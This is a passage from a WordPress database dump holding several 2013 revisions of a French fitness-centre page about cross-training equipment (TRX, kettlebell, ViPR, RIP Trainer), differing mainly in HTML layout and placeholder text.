la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2>RIP Trainer</h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 10:44:43', '2013-06-16 10:44:43', '', 22, 'http://www.crosstrainingcenter.be/?p=57', 0, 'revision', '', 0),
(58, 1, '2013-06-16 10:45:34', '2013-06-16 10:45:34', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n\r\n<table style=\"width: 100%\">\r\n<tr>\r\n<td style=\"width: 50%;padding:5px;\">1\r\n</td>\r\n<td style=\"width: 50%;padding:5px;\">2\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;padding:5px;\">3\r\n</td>\r\n<td style=\"width: 50%;padding:5px;\">4\r\n</td>\r\n</tr>\r\n</table>                 \r\n\r\n\r\n\r\n&nbsp;\r\n<h2>TRX Suspension Training</h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2>Kettlebel</h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h2>ViPR</h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2>RIP Trainer</h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 10:45:34', '2013-06-16 10:45:34', '', 22, 'http://www.crosstrainingcenter.be/?p=58', 0, 'revision', '', 0),
(59, 1, '2013-06-16 10:46:19', '2013-06-16 10:46:19', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n\r\n<table style=\"width: 100%\">\r\n<tr>\r\n<td style=\"border:0px;width: 50%;padding:5px;\">1\r\n</td>\r\n<td style=\"border:0px;width: 50%;padding:5px;\">2\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border:0px;width: 50%;padding:5px;\">3\r\n</td>\r\n<td style=\"border:0px;width: 50%;padding:5px;\">4\r\n</td>\r\n</tr>\r\n</table>                 \r\n\r\n\r\n\r\n&nbsp;\r\n<h2>TRX Suspension Training</h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2>Kettlebel</h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h2>ViPR</h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2>RIP Trainer</h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 10:46:19', '2013-06-16 10:46:19', '', 22, 'http://www.crosstrainingcenter.be/?p=59', 0, 'revision', '', 0),
(63, 1, '2013-06-16 10:53:44', '2013-06-16 10:53:44', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\ntito<br>\r\ntoto<br>\r\nproute\r\n</div>\r\n&nbsp;\r\n<h2>TRX Suspension Training</h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2>Kettlebel</h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h2>ViPR</h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2>RIP Trainer</h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 10:53:44', '2013-06-16 10:53:44', '', 22, 'http://www.crosstrainingcenter.be/?p=63', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(60, 1, '2013-06-16 10:48:24', '2013-06-16 10:48:24', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; width: 50%; padding: 5px;\">\r\n\r\n<table style=\"border:1px;width: 100%\">\r\n<tr>\r\n<td style=\"border:0px;width: 50%;padding:5px;\">imgimgimg\r\n</td>\r\n<td style=\"border:0px;width: 50%;padding:5px;\">Conçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n</td>\r\n</tr>\r\n</table>  \r\n</td>\r\n<td style=\"border: 0px; width: 50%; padding: 5px;\">2</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 0px; width: 50%; padding: 5px;\">3</td>\r\n<td style=\"border: 0px; width: 50%; padding: 5px;\">4</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h2>TRX Suspension Training</h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2>Kettlebel</h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h2>ViPR</h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2>RIP Trainer</h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 10:48:24', '2013-06-16 10:48:24', '', 22, 'http://www.crosstrainingcenter.be/?p=60', 0, 'revision', '', 0),
(61, 1, '2013-06-16 10:49:30', '2013-06-16 10:49:30', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; width: 50%; padding: 5px;\">\r\n\r\n<table style=\"border:1px;width: 100%\">\r\n<tr>\r\n<td style=\"border:0px;width: 20%;padding:5px;\">imgimgimg\r\n</td>\r\n<td style=\"border:0px;width: 80%;padding:5px;\">Conçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n</td>\r\n</tr>\r\n</table>  \r\n</td>\r\n<td style=\"border: 0px; width: 50%; padding: 5px;\">2</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 0px; width: 50%; padding: 5px;\">3</td>\r\n<td style=\"border: 0px; width: 50%; padding: 5px;\">4</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h2>TRX Suspension Training</h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2>Kettlebel</h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h2>ViPR</h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2>RIP Trainer</h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 10:49:30', '2013-06-16 10:49:30', '', 22, 'http://www.crosstrainingcenter.be/?p=61', 0, 'revision', '', 0),
(62, 1, '2013-06-16 10:49:53', '2013-06-16 10:49:53', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; width: 50%; padding: 5px;\">\r\n\r\n<table style=\"border:1px;width: 100%\">\r\n<tr>\r\n<td style=\"border:1px;width: 20%;padding:5px;\">imgimgimg\r\n</td>\r\n<td style=\"border:1px;width: 80%;padding:5px;\">Conçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n</td>\r\n</tr>\r\n</table>  \r\n</td>\r\n<td style=\"border: 0px; width: 50%; padding: 5px;\">2</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 0px; width: 50%; padding: 5px;\">3</td>\r\n<td style=\"border: 0px; width: 50%; padding: 5px;\">4</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h2>TRX Suspension Training</h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2>Kettlebel</h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h2>ViPR</h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2>RIP Trainer</h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 10:49:53', '2013-06-16 10:49:53', '', 22, 'http://www.crosstrainingcenter.be/?p=62', 0, 'revision', '', 0),
(64, 1, '2013-06-16 10:55:17', '2013-06-16 10:55:17', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\ntito<br>\r\ntoto<br>\r\nproute\r\n</div>\r\n&nbsp;\r\n<h2>TRX Suspension Training</h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2>Kettlebel</h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h2>ViPR</h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2>RIP Trainer</h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 10:55:17', '2013-06-16 10:55:17', '', 22, 'http://www.crosstrainingcenter.be/?p=64', 0, 'revision', '', 0),
(65, 1, '2013-06-16 10:57:04', '2013-06-16 10:57:04', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\ntito<br>\r\ntoto<br>\r\nproute\r\n</div>\r\n&nbsp;\r\n<h2>TRX Suspension Training</h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2>Kettlebel</h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h2>ViPR</h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2>RIP Trainer</h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 10:57:04', '2013-06-16 10:57:04', '', 22, 'http://www.crosstrainingcenter.be/?p=65', 0, 'revision', '', 0),
(66, 1, '2013-06-16 10:59:52', '2013-06-16 10:59:52', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border:1px;width: 100%\">\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">imgimgimg\r\n</td>\r\n<td style=\"border:0px;padding:5px;\"><h1>TRX Suspension Training</h1>Conçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n</td>\r\n</tr>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<h2>TRX Suspension Training</h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2>Kettlebel</h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h2>ViPR</h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2>RIP Trainer</h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 10:59:52', '2013-06-16 10:59:52', '', 22, 'http://www.crosstrainingcenter.be/?p=66', 0, 'revision', '', 0),
(67, 1, '2013-06-16 11:03:08', '2013-06-16 11:03:08', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border:1px;width: 100%\">\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">imgimgimg\r\n</td>\r\n<td style=\"border:0px;padding:5px;\"><h1>TRX Suspension Training</h1>Conçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n</td>\r\n</tr>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n<div class=\"arrondi\">\r\n<table style=\"border:1px;width: 100%\">\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">imgimgimg\r\n</td>\r\n<td style=\"border:0px;padding:5px;\"><h1>Kettlebel</h1>Outil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n</td>\r\n</tr>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n<div class=\"arrondi\">\r\n<table style=\"border:1px;width: 100%\">\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">imgimgimg\r\n</td>\r\n<td style=\"border:0px;padding:5px;\"><h1>ViPR</h1>Acronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
